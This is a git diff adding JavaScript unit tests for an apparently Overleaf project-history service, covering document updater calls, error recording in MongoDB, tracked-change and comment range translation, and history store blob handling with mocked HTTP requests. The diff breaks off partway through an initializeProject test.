a/services/project-history/test/unit/js/DocumentUpdaterManager/DocumentUpdaterManagerTests.js b/services/project-history/test/unit/js/DocumentUpdaterManager/DocumentUpdaterManagerTests.js new file mode 100644 index 0000000..a745eb4 --- /dev/null +++ 
b/services/project-history/test/unit/js/DocumentUpdaterManager/DocumentUpdaterManagerTests.js @@ -0,0 +1,184 @@ +/* eslint-disable + no-return-assign, + no-undef, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +import sinon from 'sinon' +import { expect } from 'chai' +import { strict as esmock } from 'esmock' + +const MODULE_PATH = '../../../../app/js/DocumentUpdaterManager.js' + +describe('DocumentUpdaterManager', function () { + beforeEach(async function () { + this.settings = { + apis: { documentupdater: { url: 'http://example.com' } }, + } + this.request = { + get: sinon.stub(), + post: sinon.stub(), + } + this.DocumentUpdaterManager = await esmock(MODULE_PATH, { + request: this.request, + '@overleaf/settings': this.settings, + }) + this.callback = sinon.stub() + this.lines = ['one', 'two', 'three'] + return (this.version = 42) + }) + + describe('getDocument', function () { + describe('successfully', function () { + beforeEach(function () { + this.body = JSON.stringify({ + lines: this.lines, + version: this.version, + ops: [], + }) + this.request.get.yields(null, { statusCode: 200 }, this.body) + return this.DocumentUpdaterManager.getDocument( + this.project_id, + this.doc_id, + this.callback + ) + }) + + it('should get the document from the document updater', function () { + const url = `${this.settings.apis.documentupdater.url}/project/${this.project_id}/doc/${this.doc_id}` + return this.request.get.calledWith(url).should.equal(true) + }) + + return it('should call the callback with the content and version', function () { + return this.callback + .calledWith(null, this.lines.join('\n'), this.version) + .should.equal(true) + }) + }) + + describe('when the document updater API returns an error', function () { + beforeEach(function () { + this.error = new Error('something went wrong') + this.request.get.yields(this.error, null, null) + return this.DocumentUpdaterManager.getDocument( + this.project_id, + this.doc_id, + this.callback + ) + }) + + return it('should return an error to the callback', function () { + return this.callback.calledWith(this.error).should.equal(true) + }) + }) + + return describe('when the document updater returns a failure error code', function () { + beforeEach(function () { + this.request.get.yields(null, { statusCode: 500 }, '') + return this.DocumentUpdaterManager.getDocument( + this.project_id, + this.doc_id, + this.callback + ) + }) + + return it('should return the callback with an error', function () { + return this.callback + .calledWith( + sinon.match.has( + 'message', + 'doc updater returned a non-success status code: 500' + ) + ) + .should.equal(true) + }) + }) + }) + + return describe('setDocument', function () { + beforeEach(function () { + this.content = 'mock content' + return (this.user_id = 'user-id-123') + }) + + describe('successfully', function () { + beforeEach(function () { + this.request.post.yields(null, { statusCode: 200 }) + return this.DocumentUpdaterManager.setDocument( + this.project_id, + this.doc_id, + this.content, + this.user_id, + this.callback + ) + }) + + it('should set the document in the document updater', function () { + const url = `${this.settings.apis.documentupdater.url}/project/${this.project_id}/doc/${this.doc_id}` + return this.request.post + 
.calledWith({ + url, + json: { + lines: this.content.split('\n'), + source: 'restore', + user_id: this.user_id, + undoing: true, + }, + }) + .should.equal(true) + }) + + return it('should call the callback', function () { + return this.callback.calledWith(null).should.equal(true) + }) + }) + + describe('when the document updater API returns an error', function () { + beforeEach(function () { + this.error = new Error('something went wrong') + this.request.post.yields(this.error, null, null) + return this.DocumentUpdaterManager.setDocument( + this.project_id, + this.doc_id, + this.content, + this.user_id, + this.callback + ) + }) + + return it('should return an error to the callback', function () { + return this.callback.calledWith(this.error).should.equal(true) + }) + }) + + return describe('when the document updater returns a failure error code', function () { + beforeEach(function () { + this.request.post.yields(null, { statusCode: 500 }, '') + return this.DocumentUpdaterManager.setDocument( + this.project_id, + this.doc_id, + this.content, + this.user_id, + this.callback + ) + }) + + return it('should return the callback with an error', function () { + return this.callback + .calledWith( + sinon.match.has( + 'message', + 'doc updater returned a non-success status code: 500' + ) + ) + .should.equal(true) + }) + }) + }) +}) diff --git a/services/project-history/test/unit/js/ErrorRecorder/ErrorRecorderTest.js b/services/project-history/test/unit/js/ErrorRecorder/ErrorRecorderTest.js new file mode 100644 index 0000000..79af1a8 --- /dev/null +++ b/services/project-history/test/unit/js/ErrorRecorder/ErrorRecorderTest.js @@ -0,0 +1,96 @@ +import sinon from 'sinon' +import { strict as esmock } from 'esmock' +import tk from 'timekeeper' + +const MODULE_PATH = '../../../../app/js/ErrorRecorder.js' + +describe('ErrorRecorder', function () { + beforeEach(async function () { + this.now = new Date() + tk.freeze(this.now) + this.db = { + projectHistoryFailures: { + deleteOne: sinon.stub().resolves(), + findOneAndUpdate: sinon + .stub() + .resolves({ value: { failure: 'record' } }), + }, + } + this.mongodb = { db: this.db } + this.metrics = { gauge: sinon.stub() } + this.ErrorRecorder = await esmock(MODULE_PATH, { + '../../../../app/js/mongodb.js': this.mongodb, + '@overleaf/metrics': this.metrics, + }) + + this.project_id = 'project-id-123' + this.queueSize = 445 + }) + + afterEach(function () { + tk.reset() + }) + + describe('record', function () { + beforeEach(async function () { + this.error = new Error('something bad') + await this.ErrorRecorder.promises.record( + this.project_id, + this.queueSize, + this.error + ) + }) + + it('should record the error to mongo', function () { + this.db.projectHistoryFailures.findOneAndUpdate + .calledWithMatch( + { + project_id: this.project_id, + }, + { + $set: { + queueSize: this.queueSize, + error: this.error.toString(), + stack: this.error.stack, + ts: this.now, + }, + $inc: { + attempts: 1, + }, + $push: { + history: { + $each: [ + { + queueSize: this.queueSize, + error: this.error.toString(), + stack: this.error.stack, + ts: this.now, + }, + ], + $position: 0, + $slice: 10, + }, + }, + }, + { + upsert: true, + } + ) + .should.equal(true) + }) + }) + + describe('clearError', function () { + beforeEach(async function () { + this.result = await this.ErrorRecorder.promises.clearError( + this.project_id + ) + }) + + it('should remove any error from mongo', function () { + this.db.projectHistoryFailures.deleteOne + .calledWithMatch({ project_id: this.project_id }) 
+ .should.equal(true)
+ })
+ })
+})
diff --git a/services/project-history/test/unit/js/HistoryBlobTranslator/HistoryBlobTranslatorTests.js b/services/project-history/test/unit/js/HistoryBlobTranslator/HistoryBlobTranslatorTests.js
new file mode 100644
index 0000000..c07aee8
--- /dev/null
+++ b/services/project-history/test/unit/js/HistoryBlobTranslator/HistoryBlobTranslatorTests.js
@@ -0,0 +1,497 @@
+import { expect } from 'chai'
+import { createRangeBlobDataFromUpdate } from '../../../../app/js/HistoryBlobTranslator.js'
+
+/**
+ * @import { AddDocUpdate } from "../../../../app/js/types"
+ */
+
+/**
+ *
+ * @param {string} pathname
+ * @param {string} docLines
+ * @param {AddDocUpdate["ranges"]} ranges
+ * @returns {AddDocUpdate}
+ */
+const update = (pathname, docLines, ranges) => {
+ return {
+ pathname,
+ docLines,
+ ranges,
+ version: 'version-1',
+ projectHistoryId: 'project-id',
+ doc: 'doc',
+ meta: {
+ user_id: 'user-id',
+ ts: 0,
+ },
+ }
+}
+
+describe('HistoryBlobTranslator', function () {
+ describe('createRangeBlobDataFromUpdate', function () {
+ beforeEach(function () {
+ this.text = 'the quick brown fox jumps over the lazy dog'
+ })
+ describe('for update with no ranges', function () {
+ beforeEach(function () {
+ this.result = createRangeBlobDataFromUpdate(
+ update('pathname', this.text, undefined)
+ )
+ })
+
+ it('should not return ranges', function () {
+ expect(this.result).to.be.undefined
+ })
+ })
+
+ describe('for update with empty ranges object', function () {
+ beforeEach(function () {
+ this.result = createRangeBlobDataFromUpdate(
+ update('pathname', this.text, {})
+ )
+ })
+
+ it('should not return ranges', function () {
+ expect(this.result).to.be.undefined
+ })
+ })
+
+ describe('for update with ranges object with empty lists', function () {
+ beforeEach(function () {
+ this.result = createRangeBlobDataFromUpdate(
+ update('pathname', this.text, { changes: [], comments: [] })
+ )
+ })
+
+ it('should not return ranges', function () {
+ expect(this.result).to.be.undefined
+ })
+ })
+
+ describe('for update with zero length comments', function () {
+ beforeEach(function () {
+ this.result = createRangeBlobDataFromUpdate(
+ update('pathname', this.text, {
+ changes: [],
+ comments: [
+ { op: { c: '', p: 4, t: 'comment-1', resolved: false } },
+ ],
+ })
+ )
+ })
+ it('should treat them as detached comments', function () {
+ expect(this.result).to.deep.equal({
+ comments: [{ id: 'comment-1', ranges: [] }],
+ trackedChanges: [],
+ })
+ })
+ })
+
+ describe('for update with ranges object with only comments', function () {
+ it('should return unmoved ranges', function () {
+ const result = createRangeBlobDataFromUpdate(
+ update('pathname', this.text, {
+ comments: [
+ {
+ op: { c: 'quick', p: 4, t: 'comment-1', resolved: false },
+ },
+ ],
+ })
+ )
+ expect(result).to.deep.equal({
+ comments: [
+ {
+ id: 'comment-1',
+ ranges: [{ pos: 4, length: 5 }],
+ },
+ ],
+ trackedChanges: [],
+ })
+ })
+
+ it('should merge comments ranges into a single comment by id', function () {
+ const result = createRangeBlobDataFromUpdate(
+ update('pathname', this.text, {
+ comments: [
+ {
+ op: { c: 'quick', p: 4, t: 'comment-1', resolved: false },
+ },
+ {
+ op: { c: 'jumps', p: 20, t: 'comment-1', resolved: false },
+ },
+ ],
+ })
+ )
+ expect(result).to.deep.equal({
+ comments: [
+ {
+ id: 'comment-1',
+ ranges: [
+ { pos: 4, length: 5 },
+ { pos: 20, length: 5 },
+ ],
+ },
+ ],
+ trackedChanges: [],
+ })
+ })
+
+ it('should not merge ranges into a single comment if id differs',
function () { + const result = createRangeBlobDataFromUpdate( + update('pathname', this.text, { + comments: [ + { + op: { c: 'quick', p: 4, t: 'comment-1', resolved: false }, + }, + { + op: { c: 'jumps', p: 20, t: 'comment-2', resolved: false }, + }, + ], + }) + ) + expect(result).to.deep.equal({ + comments: [ + { + id: 'comment-1', + ranges: [{ pos: 4, length: 5 }], + }, + { + id: 'comment-2', + ranges: [{ pos: 20, length: 5 }], + }, + ], + trackedChanges: [], + }) + }) + }) + + describe('for update with ranges object with only tracked insertions', function () { + it('should translate into history tracked insertions', function () { + const result = createRangeBlobDataFromUpdate( + update('pathname', this.text, { + changes: [ + { + op: { p: 4, i: 'quick' }, + metadata: { + ts: '2024-01-01T00:00:00.000Z', + user_id: 'user-1', + }, + }, + { + op: { p: 10, i: 'brown' }, + metadata: { + ts: '2023-01-01T00:00:00.000Z', + user_id: 'user-2', + }, + }, + ], + }) + ) + expect(result).to.deep.equal({ + comments: [], + trackedChanges: [ + { + range: { pos: 4, length: 5 }, + tracking: { + type: 'insert', + userId: 'user-1', + ts: '2024-01-01T00:00:00.000Z', + }, + }, + { + range: { pos: 10, length: 5 }, + tracking: { + type: 'insert', + userId: 'user-2', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ], + }) + }) + }) + + describe('for update with ranges object with mixed tracked changes', function () { + describe('with tracked deletions before insertions', function () { + it('should insert tracked deletions before insertions', function () { + const text = 'the quickrapid brown fox jumps over the lazy dog' + const result = createRangeBlobDataFromUpdate( + update('pathname', text, { + changes: [ + { + op: { p: 4, d: 'quick' }, + metadata: { + ts: '2024-01-01T00:00:00.000Z', + user_id: 'user-1', + }, + }, + { + op: { p: 4, hpos: 9, i: 'rapid' }, + metadata: { + ts: '2023-01-01T00:00:00.000Z', + user_id: 'user-2', + }, + }, + ], + }) + ) + + expect(result).to.deep.equal({ + comments: [], + trackedChanges: [ + { + range: { pos: 4, length: 5 }, + tracking: { + type: 'delete', + userId: 'user-1', + ts: '2024-01-01T00:00:00.000Z', + }, + }, + { + range: { pos: 9, length: 5 }, + tracking: { + type: 'insert', + userId: 'user-2', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ], + }) + }) + }) + + describe('with tracked insertions before deletions', function () { + it('should insert tracked deletions before insertions', function () { + const text = 'the quickrapid brown fox jumps over the lazy dog' + const result = createRangeBlobDataFromUpdate( + update('pathname', text, { + changes: [ + { + op: { p: 4, hpos: 9, i: 'rapid' }, + metadata: { + ts: '2023-01-01T00:00:00.000Z', + user_id: 'user-2', + }, + }, + { + op: { p: 4, d: 'quick' }, + metadata: { + ts: '2024-01-01T00:00:00.000Z', + user_id: 'user-1', + }, + }, + ], + }) + ) + + expect(result).to.deep.equal({ + comments: [], + trackedChanges: [ + { + range: { pos: 4, length: 5 }, + tracking: { + type: 'delete', + userId: 'user-1', + ts: '2024-01-01T00:00:00.000Z', + }, + }, + { + range: { pos: 9, length: 5 }, + tracking: { + type: 'insert', + userId: 'user-2', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ], + }) + }) + }) + + it('should adjust positions', function () { + const text = 'the quick brown fox jumps over the lazy dog' + const result = createRangeBlobDataFromUpdate( + update('pathname', text, { + changes: [ + { + op: { p: 4, i: 'quick' }, + metadata: { + ts: '2024-01-01T00:00:00.000Z', + user_id: 'user-1', + }, + }, + { + op: { p: 10, d: 'brown' }, + 
metadata: { + ts: '2023-01-01T00:00:00.000Z', + user_id: 'user-2', + }, + }, + { + op: { p: 30, hpos: 35, i: 'lazy' }, + metadata: { + ts: '2022-01-01T00:00:00.000Z', + user_id: 'user-2', + }, + }, + ], + }) + ) + expect(result).to.deep.equal({ + comments: [], + trackedChanges: [ + { + range: { pos: 4, length: 5 }, + tracking: { + type: 'insert', + userId: 'user-1', + ts: '2024-01-01T00:00:00.000Z', + }, + }, + { + range: { pos: 10, length: 5 }, + tracking: { + type: 'delete', + userId: 'user-2', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + { + range: { pos: 35, length: 4 }, + tracking: { + type: 'insert', + userId: 'user-2', + ts: '2022-01-01T00:00:00.000Z', + }, + }, + ], + }) + }) + }) + + describe('for update with ranges object with mixed tracked changes and comments', function () { + it('should adjust positions', function () { + const text = 'the quick brown fox jumps over the lazy dog' + const result = createRangeBlobDataFromUpdate( + update('pathname', text, { + comments: [ + { + op: { c: 'quick', p: 4, t: 'comment-1', resolved: false }, + }, + { + op: { + c: 'fox', + p: 11, + hpos: 16, + t: 'comment-2', + resolved: false, + }, + }, + ], + changes: [ + { + op: { p: 4, i: 'quick' }, + metadata: { + ts: '2024-01-01T00:00:00.000Z', + user_id: 'user-1', + }, + }, + { + op: { p: 10, d: 'brown' }, + metadata: { + ts: '2023-01-01T00:00:00.000Z', + user_id: 'user-2', + }, + }, + { + op: { p: 30, hpos: 35, i: 'lazy' }, + metadata: { + ts: '2022-01-01T00:00:00.000Z', + user_id: 'user-2', + }, + }, + ], + }) + ) + expect(result).to.deep.equal({ + comments: [ + { + ranges: [{ pos: 4, length: 5 }], + id: 'comment-1', + }, + { + ranges: [{ pos: 16, length: 3 }], + id: 'comment-2', + }, + ], + trackedChanges: [ + { + range: { pos: 4, length: 5 }, + tracking: { + type: 'insert', + userId: 'user-1', + ts: '2024-01-01T00:00:00.000Z', + }, + }, + { + range: { pos: 10, length: 5 }, + tracking: { + type: 'delete', + userId: 'user-2', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + { + range: { pos: 35, length: 4 }, + tracking: { + type: 'insert', + userId: 'user-2', + ts: '2022-01-01T00:00:00.000Z', + }, + }, + ], + }) + }) + + it('should adjust comment length', function () { + const text = 'the quick brown fox jumps over the lazy dog' + const result = createRangeBlobDataFromUpdate( + update('pathname', text, { + comments: [ + { + op: { c: 'quick fox', p: 4, t: 'comment-1', resolved: false }, + }, + ], + changes: [ + { + op: { p: 10, d: 'brown ' }, + metadata: { + ts: '2023-01-01T00:00:00.000Z', + user_id: 'user-2', + }, + }, + ], + }) + ) + expect(result).to.deep.equal({ + comments: [ + { + ranges: [{ pos: 4, length: 9 }], + id: 'comment-1', + }, + ], + trackedChanges: [ + { + range: { pos: 10, length: 6 }, + tracking: { + type: 'delete', + userId: 'user-2', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ], + }) + }) + }) + }) +}) diff --git a/services/project-history/test/unit/js/HistoryStoreManager/HistoryStoreManagerTests.js b/services/project-history/test/unit/js/HistoryStoreManager/HistoryStoreManagerTests.js new file mode 100644 index 0000000..db5b87d --- /dev/null +++ b/services/project-history/test/unit/js/HistoryStoreManager/HistoryStoreManagerTests.js @@ -0,0 +1,727 @@ +import sinon from 'sinon' +import { expect } from 'chai' +import { strict as esmock } from 'esmock' +import EventEmitter from 'node:events' +import { RequestFailedError } from '@overleaf/fetch-utils' +import * as Errors from '../../../../app/js/Errors.js' + +const MODULE_PATH = '../../../../app/js/HistoryStoreManager.js' + 
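+// Note: these tests drive HistoryStoreManager entirely against stubs
+// ('request' for the chunk/blob endpoints, fetch-utils for streaming),
+// so no real history-v1 service is contacted. The version arithmetic
+// asserted below is latestVersion = chunk.startVersion + changes.length
+// (e.g. 5 + 2 = 7 in the first getMostRecentVersion case).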
+describe('HistoryStoreManager', function () { + beforeEach(async function () { + this.projectId = '123456789012345678901234' + this.historyId = 'mock-ol-project-id' + this.settings = { + overleaf: { + history: { + host: 'http://example.com', + user: 'overleaf', + pass: 'password', + requestTimeout: 123, + }, + }, + apis: { + filestore: { + enabled: true, + url: 'http://filestore.overleaf.production', + }, + }, + } + this.latestChunkRequestArgs = sinon.match({ + method: 'GET', + url: `${this.settings.overleaf.history.host}/projects/${this.historyId}/latest/history`, + json: true, + auth: { + user: this.settings.overleaf.history.user, + pass: this.settings.overleaf.history.pass, + sendImmediately: true, + }, + }) + + this.callback = sinon.stub() + + this.LocalFileWriter = { + bufferOnDisk: sinon.stub(), + } + + this.WebApiManager = { + getHistoryId: sinon.stub(), + } + this.WebApiManager.getHistoryId + .withArgs(this.projectId) + .yields(null, this.historyId) + + this.FetchUtils = { + fetchStream: sinon.stub(), + fetchNothing: sinon.stub().resolves(), + RequestFailedError, + } + + this.request = sinon.stub() + + this.logger = { + debug: sinon.stub(), + warn: sinon.stub(), + } + + this.HistoryStoreManager = await esmock(MODULE_PATH, { + '@overleaf/fetch-utils': this.FetchUtils, + request: this.request, + '@overleaf/settings': this.settings, + '../../../../app/js/LocalFileWriter.js': this.LocalFileWriter, + '../../../../app/js/WebApiManager.js': this.WebApiManager, + '../../../../app/js/Errors.js': Errors, + '@overleaf/logger': this.logger, + }) + }) + + describe('getMostRecentChunk', function () { + describe('successfully', function () { + beforeEach(function () { + this.chunk = { + chunk: { + startVersion: 0, + history: { + snapshot: { + files: {}, + }, + changes: [], + }, + }, + } + this.request + .withArgs(this.latestChunkRequestArgs) + .yields(null, { statusCode: 200 }, this.chunk) + this.HistoryStoreManager.getMostRecentChunk( + this.projectId, + this.historyId, + this.callback + ) + }) + + it('should call the callback with the chunk', function () { + expect(this.callback).to.have.been.calledWith(null, this.chunk) + }) + }) + }) + + describe('getMostRecentVersion', function () { + describe('successfully', function () { + beforeEach(function () { + this.chunk = { + chunk: { + startVersion: 5, + history: { + snapshot: { + files: {}, + }, + changes: [ + { v2Authors: ['5678'], timestamp: '2017-10-17T10:44:40.227Z' }, + { v2Authors: ['1234'], timestamp: '2017-10-16T10:44:40.227Z' }, + ], + }, + }, + } + + this.request + .withArgs(this.latestChunkRequestArgs) + .yields(null, { statusCode: 200 }, this.chunk) + this.HistoryStoreManager.getMostRecentVersion( + this.projectId, + this.historyId, + this.callback + ) + }) + + it('should call the callback with the latest version information', function () { + expect(this.callback).to.have.been.calledWith( + null, + 7, + { project: undefined, docs: {} }, + { v2Authors: ['5678'], timestamp: '2017-10-17T10:44:40.227Z' } + ) + }) + }) + + describe('out of order doc ops', function () { + beforeEach(function () { + this.chunk = { + chunk: { + startVersion: 5, + history: { + snapshot: { + v2DocVersions: { + mock_doc_id: { + pathname: '/main.tex', + v: 2, + }, + }, + }, + changes: [ + { + operations: [], + v2DocVersions: { + mock_doc_id: { + pathname: '/main.tex', + v: 1, + }, + }, + }, + ], + }, + }, + } + + this.request + .withArgs(this.latestChunkRequestArgs) + .yields(null, { statusCode: 200 }, this.chunk) + this.HistoryStoreManager.getMostRecentVersion( 
+ this.projectId, + this.historyId, + this.callback + ) + }) + + it('should return an error', function () { + expect(this.callback).to.have.been.calledWith( + sinon.match + .instanceOf(Errors.OpsOutOfOrderError) + .and(sinon.match.has('message', 'doc version out of order')) + ) + }) + + it('should call the callback with the latest version information', function () { + expect(this.callback).to.have.been.calledWith( + sinon.match.instanceOf(Errors.OpsOutOfOrderError), + 6, + { + project: undefined, + docs: { mock_doc_id: { pathname: '/main.tex', v: 2 } }, + }, + this.chunk.chunk.history.changes[0] + ) + }) + }) + + describe('out of order project structure versions', function () { + beforeEach(function () { + this.chunk = { + chunk: { + startVersion: 5, + history: { + snapshot: { + projectVersion: 2, + }, + changes: [ + { + operations: [{ pathname: 'main.tex', newPathname: '' }], + projectVersion: 1, + }, + ], + }, + }, + } + + this.request + .withArgs(this.latestChunkRequestArgs) + .yields(null, { statusCode: 200 }, this.chunk) + this.HistoryStoreManager.getMostRecentVersion( + this.projectId, + this.historyId, + this.callback + ) + }) + + it('should return an error', function () { + expect(this.callback).to.have.been.calledWith( + sinon.match + .instanceOf(Errors.OpsOutOfOrderError) + .and( + sinon.match.has( + 'message', + 'project structure version out of order' + ) + ) + ) + }) + + it('should call the callback with the latest version information', function () { + expect(this.callback).to.have.been.calledWith( + sinon.match.instanceOf(Errors.OpsOutOfOrderError), + 6, + { project: 2, docs: {} }, + this.chunk.chunk.history.changes[0] + ) + }) + }) + + describe('out of order project structure and doc versions', function () { + beforeEach(function () { + this.chunk = { + chunk: { + startVersion: 5, + history: { + snapshot: { + projectVersion: 1, + }, + changes: [ + { + operations: [{ pathname: 'main.tex', newPathname: '' }], + projectVersion: 1, + }, + { + operations: [{ pathname: 'main.tex', newPathname: '' }], + projectVersion: 2, + }, + { + operations: [{ pathname: 'main.tex', newPathname: '' }], + projectVersion: 3, + }, + { + operations: [{ pathname: 'main.tex', newPathname: '' }], + projectVersion: 1, + }, + { + operations: [], + v2DocVersions: { + mock_doc_id: { + pathname: '/main.tex', + v: 1, + }, + }, + }, + { + operations: [], + v2DocVersions: { + mock_doc_id: { + pathname: '/main.tex', + v: 2, + }, + }, + }, + { + operations: [], + v2DocVersions: { + mock_doc_id: { + pathname: '/main.tex', + v: 1, + }, + }, + }, + ], + }, + }, + } + + this.request + .withArgs(this.latestChunkRequestArgs) + .yields(null, { statusCode: 200 }, this.chunk) + this.HistoryStoreManager.getMostRecentVersion( + this.projectId, + this.historyId, + this.callback + ) + }) + + it('should return an error', function () { + expect(this.callback).to.have.been.calledWith( + sinon.match + .instanceOf(Errors.OpsOutOfOrderError) + .and( + sinon.match.has( + 'message', + 'project structure version out of order' + ) + ) + ) + }) + + it('should call the callback with the latest version information', function () { + expect(this.callback).to.have.been.calledWith( + sinon.match.instanceOf(Errors.OpsOutOfOrderError), + 12, + { + project: 3, + docs: { mock_doc_id: { pathname: '/main.tex', v: 2 } }, + }, + this.chunk.chunk.history.changes[6] + ) + }) + }) + + describe('with an unexpected response', function () { + beforeEach(function () { + this.badChunk = { + chunk: { + foo: 123, // valid chunk should have startVersion 
property + bar: 456, + }, + } + this.request + .withArgs(this.latestChunkRequestArgs) + .yields(null, { statusCode: 200 }, this.badChunk) + this.HistoryStoreManager.getMostRecentVersion( + this.projectId, + this.historyId, + this.callback + ) + }) + + it('should return an error', function () { + expect(this.callback).to.have.been.calledWith( + sinon.match + .instanceOf(Error) + .and(sinon.match.has('message', 'unexpected response')) + ) + }) + }) + }) + + describe('createBlobForUpdate', function () { + beforeEach(function () { + this.fileStream = {} + this.hash = 'random-hash' + this.LocalFileWriter.bufferOnDisk.callsArgWith(4, null, this.hash) + this.FetchUtils.fetchNothing.rejects( + new RequestFailedError('', {}, { status: 404 }) + ) + this.FetchUtils.fetchStream.resolves(this.fileStream) + }) + + describe('for a file update with any filestore location', function () { + beforeEach(function (done) { + this.file_id = '012345678901234567890123' + this.update = { + file: true, + url: `http://filestore.other.cloud.provider/project/${this.projectId}/file/${this.file_id}`, + hash: this.hash, + } + this.HistoryStoreManager.createBlobForUpdate( + this.projectId, + this.historyId, + this.update, + (err, { file: hash }) => { + if (err) { + return done(err) + } + this.actualHash = hash + done() + } + ) + }) + + it('should not log any warnings', function () { + expect(this.logger.warn).to.not.have.been.called + }) + + it('should request the file from the filestore in settings', function () { + expect(this.FetchUtils.fetchStream).to.have.been.calledWithMatch( + `${this.settings.apis.filestore.url}/project/${this.projectId}/file/${this.file_id}` + ) + }) + + it('should call the callback with the blob', function () { + expect(this.actualHash).to.equal(this.hash) + }) + }) + + describe('with filestore disabled', function () { + beforeEach(function (done) { + this.settings.apis.filestore.enabled = false + this.file_id = '012345678901234567890123' + this.update = { + file: true, + url: `http://filestore.other.cloud.provider/project/${this.projectId}/file/${this.file_id}`, + hash: this.hash, + } + this.HistoryStoreManager.createBlobForUpdate( + this.projectId, + this.historyId, + this.update, + err => { + expect(err).to.match(/blocking filestore read/) + done() + } + ) + }) + it('should not request the file', function () { + expect(this.FetchUtils.fetchStream).to.not.have.been.called + }) + }) + + describe('for a file update with an invalid filestore location', function () { + beforeEach(function (done) { + this.invalid_id = '000000000000000000000000' + this.file_id = '012345678901234567890123' + this.update = { + file: true, + url: `http://filestore.other.cloud.provider/project/${this.invalid_id}/file/${this.file_id}`, + hash: this.hash, + } + this.HistoryStoreManager.createBlobForUpdate( + this.projectId, + this.historyId, + this.update, + err => { + expect(err).to.exist + done() + } + ) + }) + + it('should not request the file from the filestore', function () { + expect(this.FetchUtils.fetchStream).to.not.have.been.called + }) + }) + + describe('when the hash mismatches', function () { + beforeEach(function (done) { + this.file_id = '012345678901234567890123' + this.update = { + file: true, + url: `http://filestore.other.cloud.provider/project/${this.projectId}/file/${this.file_id}`, + hash: 'another-hash-from-web', + } + this.HistoryStoreManager.createBlobForUpdate( + this.projectId, + this.historyId, + this.update, + (err, { file: hash }) => { + if (err) { + return done(err) + } + this.actualHash = 
hash + done() + } + ) + }) + + it('should log a warning', function () { + expect(this.logger.warn).to.have.been.calledWith( + { + projectId: this.projectId, + fileId: this.file_id, + webHash: 'another-hash-from-web', + fileHash: this.hash, + }, + 'hash mismatch between web and project-history' + ) + }) + + it('should request the file from the filestore in settings', function () { + expect(this.FetchUtils.fetchStream).to.have.been.calledWithMatch( + `${this.settings.apis.filestore.url}/project/${this.projectId}/file/${this.file_id}` + ) + }) + + it('should call the callback with the blob', function () { + expect(this.actualHash).to.equal(this.hash) + }) + }) + describe('when the createdBlob flag is set on the update', function () { + beforeEach(function () { + this.file_id = '012345678901234567890123' + this.update = { + file: true, + createdBlob: true, + url: `http://filestore.other.cloud.provider/project/${this.projectId}/file/${this.file_id}`, + hash: this.hash, + } + }) + describe('when history-v1 confirms that the blob exists', function () { + beforeEach(function (done) { + this.FetchUtils.fetchNothing.resolves() + this.HistoryStoreManager.createBlobForUpdate( + this.projectId, + this.historyId, + this.update, + (err, { file: hash }) => { + if (err) { + return done(err) + } + this.actualHash = hash + done() + } + ) + }) + + it('should call the callback with the existing hash', function () { + expect(this.actualHash).to.equal(this.hash) + }) + + it('should not request the file from the filestore', function () { + expect(this.FetchUtils.fetchStream).to.not.have.been.called + }) + + it('should log a debug level message', function () { + expect(this.logger.debug).to.have.been.calledWith( + { + projectId: this.projectId, + fileId: this.file_id, + update: this.update, + }, + 'Skipping blob creation as it has already been created' + ) + }) + }) + describe('when history-v1 does not confirm that the blob exists', function () { + beforeEach(function (done) { + this.FetchUtils.fetchNothing.rejects( + new RequestFailedError( + `${this.settings.overleaf.history.host}/project/${this.projectId}/file/${this.file_id}`, + { method: 'HEAD' }, + { status: 404 } + ) + ) + this.HistoryStoreManager.createBlobForUpdate( + this.projectId, + this.historyId, + this.update, + (err, { file: hash }) => { + if (err) { + return done(err) + } + this.actualHash = hash + done() + } + ) + }) + + it('should warn that we will use the filestore', function () { + expect(this.logger.warn).to.have.been.calledWithMatch( + { + fileId: this.file_id, + projectId: this.projectId, + update: this.update, + }, + 'created blob does not exist, reading from filestore' + ) + }) + + it('should request the file from the filestore in settings', function () { + expect(this.FetchUtils.fetchStream).to.have.been.calledWithMatch( + `${this.settings.apis.filestore.url}/project/${this.projectId}/file/${this.file_id}` + ) + }) + + it('should call the callback with the blob', function () { + expect(this.actualHash).to.equal(this.hash) + }) + }) + }) + }) + + describe('getProjectBlob', function () { + describe('successfully', function () { + beforeEach(function () { + this.blobContent = 'test content' + this.blobHash = 'test hash' + + this.request.yields(null, { statusCode: 200 }, this.blobContent) + this.HistoryStoreManager.getProjectBlob( + this.historyId, + this.blobHash, + this.callback + ) + }) + + it('should get the blob from the overleaf history service', function () { + expect(this.request).to.have.been.calledWithMatch({ + method: 'GET', + 
url: `${this.settings.overleaf.history.host}/projects/${this.historyId}/blobs/${this.blobHash}`, + auth: { + user: this.settings.overleaf.history.user, + pass: this.settings.overleaf.history.pass, + sendImmediately: true, + }, + }) + }) + + it('should call the callback with the blob', function () { + expect(this.callback).to.have.been.calledWith(null, this.blobContent) + }) + }) + }) + + describe('getProjectBlobStream', function () { + describe('successfully', function () { + beforeEach(function (done) { + this.historyResponse = new EventEmitter() + this.blobHash = 'test hash' + + this.FetchUtils.fetchStream.resolves(this.historyResponse) + this.HistoryStoreManager.getProjectBlobStream( + this.historyId, + this.blobHash, + (err, stream) => { + if (err) { + return done(err) + } + this.stream = stream + done() + } + ) + }) + + it('should get the blob from the overleaf history service', function () { + expect(this.FetchUtils.fetchStream).to.have.been.calledWithMatch( + `${this.settings.overleaf.history.host}/projects/${this.historyId}/blobs/${this.blobHash}` + ) + }) + + it('should return a stream of the blob contents', function () { + expect(this.stream).to.equal(this.historyResponse) + }) + }) + }) + + describe('initializeProject', function () { + describe('successfully', function () { + beforeEach(function () { + this.response_body = { projectId: this.historyId } + this.request.callsArgWith( + 1, + null, + { statusCode: 200 }, + this.response_body + ) + + this.HistoryStoreManager.initializeProject( + this.historyId, + this.callback + ) + }) + + it('should send the change to the history store', function () { + expect(this.request).to.have.been.calledWithMatch({ + method: 'POST', + url: `${this.settings.overleaf.history.host}/projects`, + auth: { + user: this.settings.overleaf.history.user, + pass: this.settings.overleaf.history.pass, + sendImmediately: true, + }, + json: { 